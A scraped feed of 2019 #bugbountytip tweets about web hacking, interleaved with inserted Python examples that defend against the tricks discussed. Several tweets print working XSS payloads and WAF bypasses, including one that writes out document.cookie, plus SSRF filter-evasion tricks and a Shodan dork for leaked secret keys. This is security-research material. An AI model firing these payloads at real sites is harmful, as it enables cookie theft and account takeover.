5 Been triaging #bugbounty for a couple years and not once seen a XSS report showing impact - I try to do it for each I find. It’s such an easy way to raise the severity with little effort. Look for ATO (email, password change), access to sensitive data/functionality #bugbountytip
ghostlulz
@ghostlulz1337


2019-07-22 00:14:25
0 Exploit development is the new black. Want to get an easy to understand rundown of buffer overflow attacks check out this : https://t.co/FejHKKoPk4 #bugbountytip #infosec #redteam #exploit #osint #pentest #exploiting #security #Assembly #bufferoverflow #apt #hacking #pentest
Yadhavi
@PrincessYadhavi


2019-07-21 22:51:16
0 After upgrading recon-ng to version 5 in Kali, recon-ng does not show any modules. It tells "[*] No modules enabled/installed." How to solve this? #bugbounty #recon-ng #reconng #bugbountytip cc: @LaNMaSteR53
bugbountylab
@artofbugbounty


2019-07-21 17:49:18
1 Get Your Latest Currency Exchange Rates | Refreshing In Every 30 Seconds Mission: Craft a payload link that causes the page stop loading completely through regular expression Denial of Service (ReDoS). https://t.co/8t3nJnhrwr #bugbounty #bugbountytip #bugbountytips #appsec https://t.co/4o3tWcGs4h
pi0wlz
@pi0wlz


2019-07-21 17:37:18
0 #bugbountytip When you run Amass and got a big list with Search engines parse with $ cat amass-findings | sed -e 's/\[[^][]*\]//g' | sed 's/^[ \t]*//;s/[ \t]*$//'
Nikos Gkogkos
@ngkogkos


2019-07-21 11:12:08
1 Love @owaspamass, wordlist masks open so many possibilities! Observing already known subdomains and other naming conventions of the organisation in combination with this could help spot crazy subdomains. #bugbounty #bugbountytip #recon https://t.co/n0iap7t4nZ
Rapid Safeguard
@RapidSafeguard


2019-07-21 04:40:21
0 Self contained htaccess shells and attacks https://t.co/U3THkDJ3Ql #infosec #bugbountytip #bugbounty
bugbountylab
@artofbugbounty


2019-07-21 01:46:24
0 Discover Secret Key from a subdomain disclosed via a Github code repository https://t.co/3MVFLLLHze #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/uztLdgrW5E
محمدن
@mwamiaim


2019-07-20 14:03:15
1 Anyone has a good resource for SSRF Payloads ? #bugbountytip #bugbountytips #Bugbounty
bugbountylab
@artofbugbounty


2019-07-20 12:55:50
0 @NathOnSecurity Cool. It's surprising to get rewarded with weak ssl/tls issues. Thanks for the share. #bugbountytips #bugbountytip
Murdockz
@Murdockz_CEH


2019-07-20 12:15:42
1 AWS S3 buckets do not allow for capital letters in the s3 bucket name. Using a tool like @TomNomNom gf will allow you to find all s3 buckets and sometimes they include capital letters. This will allow for s3 bucket takeovers. My recent s3 takeover. #bugbountytip #bugbountytips
bl4de
@_bl4de


2019-07-20 12:14:16
5 Default #passwords list #hacking #itsecurity #bugbountytip #pentesting https://t.co/tldQUMtFDg
bl4de
@_bl4de


2019-07-20 12:11:20
4 #GTFOBins is a curated list of #Unix binaries that can be exploited by an attacker to bypass local security restrictions. #Linux #hacking #itsecurity #DevOps #PenTesting #bugbountytip https://t.co/50z447IFRc
0xd0m7
@0xd0m7


2019-07-20 09:00:10
1 #bugbountytip Sometimes you will receive a 400 bad request if you are fuzzing with double slash: Solved with a match replace rule!! // > / https://t.co/xTMnrhHOOQ
Mehmet Aura
@rootauraw


2019-07-20 06:20:01
1 Yay! I got 125$ from a PRIVATE program on BUGCROWD for UNCLAIMED SOCIAL MEDIA ACCOUNT using my SCRIPT. ❤️ (https://t.co/BcU0KfqJgh ) Thanks to @bugraeskici #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd
bugbountymemes
@bugbounty_memes


2019-07-20 05:49:17
0 Domain has url :- "Example(.)com/abcd/xyz" ! "Inurl:abcd inurl:xyz" helped me to get internal IP (X.X.X.X/abcd/xyz) I got 50$ for this #bugbountytip #hackerone #bugbounty #bugcrowd
Frederick Alcantara
@sirfreddyal


2019-07-20 01:47:15
1 Quick guide on Web App Security for any developers out there https://t.co/qNO9UUaj4f #javascript #dApp #webdev #php #python #bugbounties #bugbountytip #pentest
ghostlulz
@ghostlulz1337


2019-07-19 17:33:27
1 If you like easy wins go to github and find exposed credentials. I've personally used this tool on a few engagements, it's great! #infosec #bugbountytip #redteam #osint #bugbountytips #bugbounty https://t.co/Xf3T7CmWPF
HAHWUL
@hahwul


2019-07-19 16:51:15
1 My toy project! I have now released the XSS scanning library. The name is "XSpear". It is a small and simple project, but I hope it any use well. (Probably a lot of bugs.......) Thx! https://t.co/RNeObHB3kz https://t.co/Xa4zLYKAEq #XSS #BugBounty #bugbountytip #Hacking #Ruby
Rob Fitzpatrick
@rpfitzpatrick


2019-07-19 15:05:57
0 I know it seems obvious. But Slack notifications for your bug hunting automation are a godsend. #bugbountytip https://t.co/4bpDFpwbbB
securibee 🐝
@securibee


2019-07-19 14:02:10
0 When in doubt, upload All The Things. https://t.co/towFxaHpke #bugbountytip #infosec
cybersecurity.wtf
@CyberSecWTF


2019-07-19 13:54:05
0 @Alra3ees Thanks for the share. Replicated in Lab with a ten-year-old subdomain. #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/FZVVCpl4YO https://t.co/xCLont0mcm
m0z
@LooseSecurity


2019-07-19 13:52:55
2 #bugbountytip #bugbounty #bugbountytips #infosec If a bounty program has upload servers in-scope, try uploading an SVG. Some endpoints might block it, but it doesn't mean they all do! SVGs can include HTML/JS and lead to stored XSS.
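For the upload-side defence against the SVG tip above, here is an added example (not code from the tweet or from any upload service) that audits an uploaded SVG for active content before it is accepted: script elements, embedded foreign documents, on* event handlers and javascript:/data: hrefs. The two sample files are constructed; the element and scheme lists are this example's own choices, not a standard.

```python
"""Added example: pre-acceptance audit of an uploaded SVG for active content."""
import xml.etree.ElementTree as ET

# Elements that carry script or embed other documents; a plain drawing needs none of them.
# (List chosen for this example; tighten or extend it for your own allow-list.)
DANGEROUS_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object", "use"}
# URI schemes that must not appear in href / xlink:href.
DANGEROUS_SCHEMES = ("javascript:", "data:", "vbscript:")


def _local(qualified):
    """Strip an ElementTree namespace prefix: '{http://www.w3.org/2000/svg}svg' -> 'svg'."""
    return qualified.rsplit("}", 1)[-1].lower()


def audit_svg(data):
    """Return a list of findings; an empty list means no active content was found.

    Parsing uses the standard library; for untrusted uploads at scale use
    defusedxml to also cover entity-expansion (billion laughs) attacks.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return ["not well-formed XML: %s" % exc]
    findings = []
    if _local(root.tag) != "svg":
        findings.append("root element is <%s>, not <svg>" % _local(root.tag))
    for el in root.iter():  # root.iter() walks the whole tree, root included
        name = _local(el.tag)
        if name in DANGEROUS_ELEMENTS:
            findings.append("element <%s> is not allowed" % name)
        for attr, value in el.attrib.items():
            aname = _local(attr)  # handles xlink:href as well as plain href
            if aname.startswith("on"):
                findings.append("event handler %s on <%s>" % (aname, name))
            elif aname == "href" and value.strip().lower().startswith(DANGEROUS_SCHEMES):
                findings.append("%s on <%s> uses a %s: URI" % (aname, name, value.split(":", 1)[0]))
    return findings


def is_safe_svg(data):
    return not audit_svg(data)


# Constructed sample uploads.
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">
  <script>alert(document.domain)</script>
  <a xlink:href="javascript:alert(1)"><text x="1" y="10">click</text></a>
</svg>"""

CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="red"/>
</svg>"""

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SVG), ("clean", CLEAN_SVG)):
        print(label, audit_svg(sample))
```

An audit like this is one layer; the other is how the file is served. Even a rejected-nothing SVG is harmless to the main origin when uploads are delivered from a separate domain with Content-Disposition: attachment, so the two controls belong together.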
m0z
@LooseSecurity


2019-07-19 12:52:35
2 #bugbounty #bugbountytip #bugbountytips #infosec When doing a bug bounty always read previous reports. It helps you figure out what kind of issues existed in the application in the past and saves a lot of time on reconnaissance.
D3cy9h4
@DecyphaC


2019-07-19 12:23:53
2 They either think Google Chrome is unhackable, or they're taking their security seriously??! But it will be a result if we do find a bug 😁 #BugBounty #infosec #bugbountytip https://t.co/WJz2gAAT0V
ghost_rider_0x90
@gh0st_R1d3r_0x9


2019-07-19 10:00:47
0 Anyone ever encountered Regex based DOS vulnerability? I saw the vulnerable code but need help with POC. #BugBounty #bugbountytip #bugbountytips
kassih mouhssine
@KassihMouhssine


2019-07-19 09:43:09
0 New bug at @mailru, I have bypassed the filter and got a nice stored XSS. I got a 150$ bounty but the problem here is the payload is just alert(1), nothing else :'( @Hacker0x01 #bugbounty #infosec #BugBountyTip https://t.co/8wPI0fBq0c
Ammar Amer
@cry__pto


2019-07-19 09:37:39
3 I have uploaded hundreds of articles about all fields of the hacking science as PDF files to my GitHub repository. The updates will continue to arrive to the repository until it reaches 2000 links & PDF files, at any time soon. https://t.co/q2layzVpKz #bugbountytip #OSINT #Malware
Sarvagya Sagar
@0ffensivemitthu


2019-07-19 05:15:22
5 -- "Fall in love with Regex" by Sarvagya Sagar https://t.co/bsRojqvuXy : This article won't give you a magical power. The main purpose of this article is to serve as a first aid to newbies. [ #BugBounty #bugbountytip #infosec #CyberSecurity #bugbountytips #hacking #programmer ]
cybersecurity.wtf
@CyberSecWTF


2019-07-19 01:25:12
0 @HusseiN98D Congrats :) Always love that find. Replicated it in lab #bugbountytips #bugbountytip https://t.co/PEpNpJXjqr https://t.co/tJGRT2OJ3u
healthyoutlet
@healthyoutlet


2019-07-18 17:43:21
0 #bugbountytip the careers section of a website can leak information you might not find elsewhere. If they're looking to hire someone who has experience with some tech you didn't find during recon that might be a clue where else to dig.
cybersecurity.wtf
@CyberSecWTF


2019-07-18 14:45:45
0 @cnotin Oh damn. That's a good point. Thanks for sharing. I've made it available for practice in Lab https://t.co/W0YH06Fp6o #bugbountytip #appsec https://t.co/AmBsGsvy1Z
Sarvagya Sagar
@0ffensivemitthu


2019-07-18 05:41:54
0 [ #BugBounty #bugbountytip ] -- 💰 CRLF Injection Attack Video : https://t.co/5CFxKKosiG Writeup : https://t.co/ZO8QytNJ42 or https://t.co/MmKNu3hMau or https://t.co/rM8kZu6GHP Cheatsheet : https://t.co/EnybRyA7AA
ghostlulz
@ghostlulz1337


2019-07-18 03:55:59
1 Winner Winner Chicken Dinner. If you're not using the waybackmachine to find vulnerable endpoints you might be missing out on some bug bounty money. More info on my blog: https://t.co/IcaV2mPjQV #BugBounty #bugbountytip #bugbountytips #infosec #redteam #osint #waybackmachine
ph0rensic
@ph0rensic


2019-07-17 23:49:47
0 Shodan search RUBY DEBUG html:"secret_key_base" html:"rack.version" #bugbountytip #BugBounty
sagar yadav
@sagaryadav8742


2019-07-17 20:08:54
1 3rd bounty of this month 😊😊😊 It's time to plant some new tree's 🌱 Secure_website and Secure-nature #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty https://t.co/fd60QKMJXj
SaadAhmed
@XSaadAhmedX


2019-07-17 17:40:54
2 Thinking of making a RECON web based tool using flask + python 😀 Need suggestion what you want in this tool please share ideas along reference 😉 #BugBounty #infosec #bugbountytip #bugbountytips
healthyoutlet
@healthyoutlet


2019-07-17 13:35:15
0 #bugbountytip There ARE bugs that haven't been found, just keep looking. https://t.co/dQmf6tzHbY
Sarvagya Sagar
@0ffensivemitthu


2019-07-17 13:30:41
3 [ #bugbounty #bugbountytip ] - HTML Injection 🔥 Intro : https://t.co/CVABpaoutF Video : https://t.co/p3EsNso7y3 Writeup : https://t.co/sZ6CGqcuW8 or https://t.co/wG9l0Bhh2v or https://t.co/TJZQdVe9dC or https://t.co/XXsHNAO8ob or https://t.co/o2MQEj5buw
Ishaq Mohammed
@security_prince


2019-07-17 13:19:12
3 If you have your input reflecting in a javascript variable simply close the context with </script> and start a new <script> tag for #xss thanks to @s0md3v @brutelogic for sharing their awesome research on xss #xss #bugbountytips #bugbountytip #bugbounty https://t.co/DRtHXi4TFB
Evan
@evanricafort


2019-07-17 11:48:15
0 Fun #BugBountyTip: distribute your blind-XSS payload to any of your target and maybe one day it will fire up on their end if they will be having a end of quarter checking/validation :p
Samet ŞAHİN
@sametsahinnet


2019-07-17 11:46:41
0 A simple #BugBountytip about deep subdomain search : Google dork > site:*.*.target.com #BugBounty
Dhamu
@Dhamuharker


2019-07-17 07:16:51
1 #bugbountytip #bugbounty Story of my Biggest Bounty ever : Command Execution on Jenkin https://t.co/GtJFtgKw74
bl4de
@_bl4de


2019-07-16 19:52:17
1 Sometimes, when you run off the ideas, it's good to back to basics 😉 #bugbountytip #hacking #webappsec #WAHH @PortSwigger @DafyddStuttard https://t.co/zatsQY45MC
ΡRΛSΞUDΟ
@praseudo


2019-07-16 19:33:33
1 Some android hacking related #bugbounty #androidsecurity #androidhacking #infosec #bugbountytip https://t.co/agYj45YgSe
Dan Field
@Surfrdan


2019-07-16 18:41:43
0 @nahoragg @Hacker0x01 Nicely done! And great #bugbountytip in the thread. Monitoring is key with large scopes.
Leonel Emiliano
@leoalgare


2019-07-16 13:35:19
0 Yay, I was awarded a $700 bounty on @Hacker0x01! Reflected XSS + unrestricted CSP leads to account takeover. (High severity) Weaponize your xss payloads and show the real impact #bugbountytip #bugbountytips https://t.co/UA8jUEN1ss #TogetherWeHitHarder
cybersecurity.wtf
@CyberSecWTF


2019-07-16 12:24:22
0 @0xInfection Now available for practice in lab https://t.co/Zp8nolQIhq #bugbountytip https://t.co/1LyHcMD6JR
Shammah Agwor
@Zealsham


2019-07-16 12:20:56
0 If you query a Jira API endpoint and you are getting an empty result, try to find the Jira login page of your target. A temporary session cookie will be given to you. You can use this to query the endpoint and get a valid result #BugBounty #bugbountytip
Brute Logic
@brutelogic


2019-07-16 11:41:15
2 Check this writeup! #XSS #bugbountytip https://t.co/BNFapWjYqg
Mads
@iGotRootBlog


2019-07-16 10:47:07
0 Reading manpages can teach you so much. Just found out you can get exploits from a XML nmap file through searchsploit Example with verbose flag for real time results: searchsploit -v --nmap nmapfile.xml Time to automate this? I think so! #bugbountytip #pentesting #bugbountytips
YS
@YShahinzadeh


2019-07-16 10:00:21
1 site-a has open redirect limited to site-b or x.site-a. The browser will keep the # of URL. site-a/?url=site-b/path#payload -> site-b/path#payload the same for x.site-a. You might take advantage of full redirect and stealing an auth token #bugbounty #bugbountytip
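A server-side counterpart to the redirect tip above, as an added example that is not code from the tweet: a redirect-target validator that accepts only same-site paths or an exact host allowlist, which is what stops the `?url=site-b/path#payload` pattern from reaching a third party in the first place. The host names are constructed.

```python
"""Added example: validating a user-supplied redirect target before issuing a 302."""
from urllib.parse import urlsplit, urlunsplit

# Constructed allowlist: the only absolute hosts this application will redirect to.
ALLOWED_HOSTS = {"site-a.example"}


def validate_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """Return a cleaned redirect URL, or None if the target must be refused.

    Accepted: a path on the current site ("/account"), or an http(s) URL whose
    hostname is exactly in the allowlist. Everything else is refused, including
    protocol-relative "//host", backslash tricks, and non-http schemes.
    """
    parts = urlsplit(target.strip())

    # Non-web schemes (javascript:, data:, ...) are never redirect targets.
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return None

    if parts.netloc:
        # Absolute (or protocol-relative) URL: hostname must match exactly.
        # parts.hostname already discards userinfo, so "site-a.example@evil" fails.
        host = (parts.hostname or "").lower()
        if host not in allowed_hosts:
            return None
    else:
        # Relative target: must be a rooted path with no backslashes, which browsers
        # treat as forward slashes ("/\\evil" would become "//evil").
        if not parts.path.startswith("/") or "\\" in parts.path:
            return None

    # The fragment is dropped from the Location header; note that the browser
    # re-attaches the fragment of the *original* request URL anyway, so keeping
    # tokens out of fragments is a separate requirement.
    return urlunsplit((parts.scheme, parts.netloc, parts.path, parts.query, ""))


if __name__ == "__main__":
    for candidate in ("/account/settings",
                      "https://site-a.example/home#t=1",
                      "https://site-b.example/path#token",
                      "//site-b.example/path",
                      "site-b.example/path",
                      "javascript:alert(1)"):
        print("%-40s -> %r" % (candidate, validate_redirect(candidate)))
```

Exact host matching is deliberate: prefix or suffix matching ("ends with site-a") is what lets `x.site-a`-style or `site-a.evil`-style hosts through, and as the tweet notes, once a cross-origin hop is allowed the fragment travels with it.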
SaadAhmed
@XSaadAhmedX


2019-07-16 07:20:45
3 Here Is the Write-up how I use Click Jacking to exploit CSRF https://t.co/o3mNTG47U6 #bugbountytip #bugbountytips #bugbounty @Bugcrowd
Sarvagya Sagar
@0ffensivemitthu


2019-07-16 06:30:58
1 [ Capture Session Token ] wget -q --save-cookies=cookie.txt --keep-session-cookies --post-data="username=admin&password=pass&Login=Login" http://target/login.php #BugBounty #bugbountytip #bugbountytips #infosec 🌈
Shammah Agwor
@Zealsham


2019-07-16 00:45:23
0 Let’s not forget that @yaworsk started this whole streaming thing with his PRO TIPs series #BugBounty #bugbountytip
cybersecurity.wtf
@CyberSecWTF


2019-07-15 18:25:52
0 H1 top 15 most common vulnerabilities #appsec #bugbountytip https://t.co/wqsqrUeibX
Abugzlife
@abugzlife1


2019-07-15 14:33:12
6 New post about the not so special bugs out there. Hopefully this will help motivate beginners that are struggling to see the light at the end of the tunnel, and show some of the very simple, impactful bugs out there. https://t.co/Ti0DlwgYR8 #bugbounty #bugbountytip #infosec
[email protected]řķ Kňığhť
@eye100_eagle


2019-07-15 13:04:07
0 $500 000 Bug Bounty Campaign https://t.co/ZdytT3Pg8D #bugbounty #hackerone #bugbountytip #ItTakesaCrowd
Emre Selim
@emre_selim8


2019-07-15 10:02:03
0 I was the 2nd hacker in the Hall of Fame of Ford in 3 days. How did I do this? 😋 #bugbounty #hackerone #halloffame #bugbountytip https://t.co/1rt3KpZCWs
Tismayil
@Tismayil1


2019-07-15 08:18:35
0 Good Weeks. #bugbountytip @Hacker0x01 https://t.co/xJfdyCvm5r
Wh11teW0lf
@Wh11teW0lf


2019-07-15 06:44:20
0 #bugbountytip Always visit Out of Scope subdomains and domains to get new endpoints for In Scope targets!
ghostlulz
@ghostlulz1337


2019-07-14 21:29:10
1 Do you like hacking? Doing you like learning new offensive security techniques? Do you like making money with bugbounties? If so check this out: https://t.co/pAdnbe5VeU #BugBounty #bugbountytip #bugbountytips #infosec #redteam #dfir #Pentesting #hacking #hacker #osint #offsec
Th3G3nt3lman
@Th3G3nt3lman


2019-07-14 15:02:21
6 1) Amass one of the new target domains, nothing good 3) Search github and found a subdomain "k8s" 4) The site responded with K8s clusters names & details 5) Added the names to altdns wordlist, Run 6) 4 subdomains appeared & unauthorized access to K8s Dashboards 😅 #bugbountytip
bl4de
@_bl4de


2019-07-14 08:11:09
2 Here's why manual exploitation will always win with automated tools 😬 Also, here's the reason why you should read #bugbounty writeups 😁 Great catch by @h1_sp1d3r inspired by @gerben_javado post #hacking #itsecurity #bugbountytip #searchingforholes https://t.co/NipaLOv8D7 https://t.co/qrIF1uW6k8
Richard Strnad
@NateTheRiver


2019-07-12 13:37:29
0 Pretty useful when you forget to start some long-running scan via nohup command or in tmux/screen session. #bugbountytip #bugbountytips #Linux https://t.co/ofhPGEpzEv
Sarvagya Sagar
@0ffensivemitthu


2019-07-12 10:20:21
0 [ #BugBounty #bugbountytip ] - Cross site request forgery 💰 Video : https://t.co/0W0FfO385m Paper : https://t.co/IE1UEx1ApU or https://t.co/m3h6mYdblI Cheatsheet : https://t.co/FVweb3zDCG Writeup : https://t.co/RZg50gukWu or https://t.co/NwHDQOmKo8 or https://t.co/7SoDFPXLxN
Hussein Daher
@HusseiN98D


2019-07-11 22:31:03
0 What is your manual recon approach? Mine: -Github -Censys -Shodan -Google dorks -Bing search #bugbountytip #bugbountytips #bugbounty
Cyberthereaper
@Cyberthereaper3


2019-07-11 18:45:25
1 I earned 500$ for my Submission on HackerOne ❤ #Hacker0x01 ❤️ #hackerone ❤ #bugbountytip ❤ #infosec ❤
securibee 🐝
@securibee


2019-07-11 18:36:18
0 dedupe and sort your wordlist in place sort -u -o wordlist.txt wordlist.txt #bugbountytip #infosec
Ben Sadeghipour
@NahamSec


2019-07-11 15:30:34
6 Here's this weeks Bug Bounty Protip! If you have some tips you'd like me to share, send them my way and I may use them for in the future. More on my stream this Sunday at 10:00am PDT! #bugbountytip https://t.co/pnw3EFhVWO
HackIsOn ®
@hackison


2019-07-11 12:05:09
3 Cloudflare #WAF Bypass Just use {alert`1`} instead of alert(1). Any #XSS vector will work (except <script>). #BruteTips #bugbounty #bugbountytips #bugbountytip #Https #malware #vulnerability #webdev #CMS #opensource #Linux #API #infosec #DDoS https://t.co/MZNlWR8wGn
c0mr3x
@c0mr3x


2019-07-11 11:50:57
0 Found XSS in private bug-bounty .. document was filtered, so as () .. my final payload -> javascript:setTimeout`\x64ocument.write\x28\x64ocument.\x63ookie\x29` #bugbountytip #BugBounty
Petko D. Petkov
@pdp


2019-07-10 17:48:17
1 “If you set your goals ridiculously high and it’s a failure, you will fail above everyone else’s success.” — James Cameron #bugbountytip
SΛKYB
@sakyb7


2019-07-10 15:41:46
0 Here is writeup for an interesting Account takeover vulnerability. #bugbounty #bugbountytip #TogetherWeHitHarder https://t.co/aZe7EB0SYY
Tyrell Wellick
@TyrellWellick00


2019-07-10 15:15:14
0 Just found an app which keeps its chat backup in plain text. @three_cube #bugbountytip #messaging #Hackers Pro tip : Always try to access the chat database of the messaging or chatting app you use. I was able to access the messages in plain text. https://t.co/sq4n7wI2TV
Fisher
@Regala_


2019-07-10 08:59:14
0 It's that time of the year 🥳🙏 @Burp_Suite #bugbounty #bugbountytip https://t.co/pKonoklXxL
Touhid M Shaikh
@touhidshaikh22


2019-07-09 23:51:12
0 Subdomain Takeover Basic Understanding https://t.co/PcSPMI33IT #BugBounty #BugBountyTip #subdomain #basic https://t.co/Q3pNvsOwQH
Mike Lierman
@MikeLierman


2019-07-09 22:06:18
0 @0xInfection #infosec #bugbounty #bugbountytip What. No way. I didn't know this!
Nikos Gkogkos
@ngkogkos


2019-07-09 20:27:29
0 Email clients' browser engines are fascinating! Often you can control the layout of generated emails by messing with HTML/CSS. Example payloads to affect how emails render: <% <!-- <p style="display:none;" <div style="visibility:hidden"> #BugBounty #BugBountyTip #BugBountyTips
Ammar Amer
@cry__pto


2019-07-09 13:46:09
2 1500 links to awesome resources and the number will continue to get higher until it reaches 2000 links during the next few coming days. #BugBounty #Hacking #Malware #redteam #cybersecurity #infosec #pentest #BugBountyTip https://t.co/q2layzVpKz https://t.co/2XyhkruBx7
David Vieira-Kurz
@secalert


2019-07-09 09:41:19
0 Besides @Burp_Suite, CIRT nikto and nmap with NSE ... which other web security scanner would you recommend these days which costs max $500 per year AND works on mac/linux? #infosec #BugBounty #BugBountyTip #bugbountytips
alias ls=' rm -rf /'
@spyerror


2019-07-09 06:53:23
0 Cloudflare XSS Bypass via add 8 or more superfluous leading zeros for dec and 7 or more for hex. Dec: <svg onload=prompt%26%230000000040document.domain)> Hex: <svg onload=prompt%26%23x000000028;document.domain)> #Bypass #WAF #XSS #Cloudflare #BugBountyTip
Coding_Karma
@karma_coded


2019-07-08 21:38:01
0 That moment when you fuck around with APIs for PII leakage then find a file that has it all and no access control configuration chain with IDOR and BAM entire DB 🤯😂 #bugbounty #bugbountytip #infosec #security https://t.co/L4P8vfzTG2
securibee 🐝
@securibee


2019-07-08 19:59:27
0 https://t.co/kG7era7rGr analyze a chrome extensions risk before using it by @duo_labs be safe out there. #infosec #bugbountytip
Ammar Amer
@cry__pto


2019-07-08 17:34:47
1 Obtaining Login Tokens for an Outlook, Office or Azure Account. https://t.co/0uHH0nM2XI #BugBounty #bugbountytip
alias ls=' rm -rf /'
@spyerror


2019-07-08 17:05:29
0 CloudFront XSS bypass: <--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> #BugBountyTip #WAF #Researcher #Bug #Security #BugBounty
Infected Drake
@0xInfection


2019-07-08 16:26:48
12 I learnt today that IP addresses can be shortened by dropping the zeroes. Examples: http://1.0.0.1 → http://1.1 http://192.168.0.1 → http://192.168.1 This bypasses WAF filters for SSRF, open-redirect, etc where any IP as input gets blacklisted. #infosec #bugbounty #bugbountytip https://t.co/2zcrLCmq0R
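The tip above exists because filters compare the raw string while the network stack parses it. Here is an added example (not code from the tweet) of the defender's fix: canonicalize an IPv4 literal the way inet_aton does before checking it against internal ranges. It goes a little beyond the tweet by also handling the other short forms that the same parsing accepts (hex parts, octal parts and a single 32-bit integer), since a filter that only fixes the dropped-zero case is still bypassable. Python's `ipaddress` module rejects all of these forms outright, which is why a separate normalizer is needed.

```python
"""Added example: canonicalize shortened IPv4 literals before an SSRF / redirect check."""
import ipaddress
from typing import Optional


def _parse_part(text):
    """Parse one dotted component like inet_aton: 0x.. hex, leading-0 octal, else decimal."""
    t = text.lower()
    if not t.isalnum():  # int() would accept '1_0', '+1' and whitespace; refuse them
        raise ValueError(text)
    if t.startswith("0x"):
        return int(t[2:], 16)
    if len(t) > 1 and t.startswith("0"):
        return int(t, 8)
    return int(t, 10)


def normalize_ipv4(text) -> Optional[str]:
    """Return the dotted-quad form of an IPv4 literal in any inet_aton shape, else None.

    '1.1' -> '1.0.0.1', '192.168.1' -> '192.168.0.1', '0x7f.1' -> '127.0.0.1',
    '2130706433' -> '127.0.0.1'. Hostnames and malformed input yield None.
    """
    parts = text.strip().split(".")
    if not 1 <= len(parts) <= 4 or any(p == "" for p in parts):
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    head, last = values[:-1], values[-1]
    if any(v > 0xFF for v in head):
        return None
    # Every leading part is one octet; the last part fills all remaining bytes.
    remaining = 4 - len(head)
    if last >= 1 << (8 * remaining):
        return None
    number = 0
    for v in head:
        number = (number << 8) | v
    number = (number << (8 * remaining)) | last
    return str(ipaddress.IPv4Address(number))


def is_internal_ipv4_literal(text) -> bool:
    """True if text is an IPv4 literal (in any short form) that points at a non-public range.

    Hostnames return False here: they must be resolved and the resulting
    addresses passed through this same check (and pinned for the actual connection).
    """
    canonical = normalize_ipv4(text)
    if canonical is None:
        return False
    ip = ipaddress.IPv4Address(canonical)
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


if __name__ == "__main__":
    for sample in ("1.1", "192.168.1", "0x7f.1", "0177.0.0.1", "2130706433",
                   "169.254.169.254", "example.com"):
        print("%-16s -> %-16s internal=%s" % (sample, normalize_ipv4(sample),
                                              is_internal_ipv4_literal(sample)))
```

The check has to run on what the client will actually connect to, not on the submitted string, so in a real SSRF guard the same range test is applied again after DNS resolution and the connection is made to that resolved address rather than re-resolving.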
healthyoutlet
@healthyoutlet


2019-07-08 15:55:58
0 what's one of the lesser-known tools in your bug bounty arsenal? I'm not sure how many of you are using this one but I do a lot of API testing with postman https://t.co/SBo6D8qPKN #bugbounty #bugbountytip
bl4de
@_bl4de


2019-07-08 15:35:25
3 One of the best set of #bugbountytips ever, in one thread Read, learn, use daily and share with others 😁 #BugBounty #bugbountytip #hacking #PenTest #ITSecurity https://t.co/nL4Co2SBNs
Fisher
@Regala_


2019-07-08 15:18:28
2 Awesome thread of bounty tips by @pdp 🥳🥳🥳 #bugbounty #bugbountytip https://t.co/x48UW2of2G
Hussein Daher
@HusseiN98D


2019-07-08 12:47:18
2 CloudFront XSS bypass: <--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> #BugBountyTip
alias ls=' rm -rf /'
@spyerror


2019-07-08 12:07:53
2 Another #Cloudflare #XSS #Bypass xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> #WAF #BugBounty #BugBountyTip
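Both Cloudflare payloads in this feed (the leading-zero character references above at 2019-07-09 and the srcdoc form here) work for one reason: the filter matches the encoded bytes while the browser matches the decoded ones. As an added example that is not from either tweet, here is the inspection-side fix: decode URL encoding and HTML character references to a canonical form first, then apply the pattern rules. The rule set is this example's own small illustration, not a WAF ruleset, and the sample inputs are the payloads quoted in the feed.

```python
"""Added example: canonicalize before matching, so encoded and literal forms compare equal."""
import html
import re
from urllib.parse import unquote

# Illustrative rules; a real ruleset is far larger, but the normalization step is the point.
RULES = {
    "script-tag":    re.compile(r"<\s*script\b", re.I),
    "event-handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "js-sink-call":  re.compile(r"\b(?:alert|prompt|confirm)\s*[(`]", re.I),
    "js-uri":        re.compile(r"javascript\s*:", re.I),
}


def normalize(payload, rounds=3):
    """URL-decode until stable (bounded), then decode HTML character references.

    html.unescape accepts numeric references with any number of leading zeros and
    without a trailing semicolon, exactly like the browser does, so
    '&#0000000040' and '&#x000000028;' both become '('.
    """
    text = payload
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return html.unescape(text)


def detect(text):
    """Return the set of rule names that match the given text as-is."""
    return {name for name, rx in RULES.items() if rx.search(text)}


def inspect(payload):
    """What a filter should do: match on the canonical form, not the raw bytes."""
    return detect(normalize(payload))


# Constructed inputs: the payload strings quoted in the feed.
RAW_DEC = "<svg onload=prompt%26%230000000040document.domain)>"
RAW_HEX = "<svg onload=prompt%26%23x000000028;document.domain)>"
RAW_SRCDOC = "xss'\"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>"

if __name__ == "__main__":
    for raw in (RAW_DEC, RAW_HEX, RAW_SRCDOC):
        print("raw   :", sorted(detect(raw)))
        print("canon :", normalize(raw), sorted(inspect(raw)))
```

The srcdoc case shows why the HTML-entity step belongs in the pipeline even after URL decoding: the entity is decoded by the browser when it reads the attribute value, so the document the iframe renders contains a literal `<script>` that the raw request never did.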
chouaib Hm
@chouaibhm


2019-07-08 10:55:49
0 Abusing PHP Query String parser bypass IDS/IPS/WAF #bugbountytip #infosec #Pentesting #BugBounty https://t.co/JdZbeT4GGt
David Vieira-Kurz
@secalert


2019-07-08 10:03:17
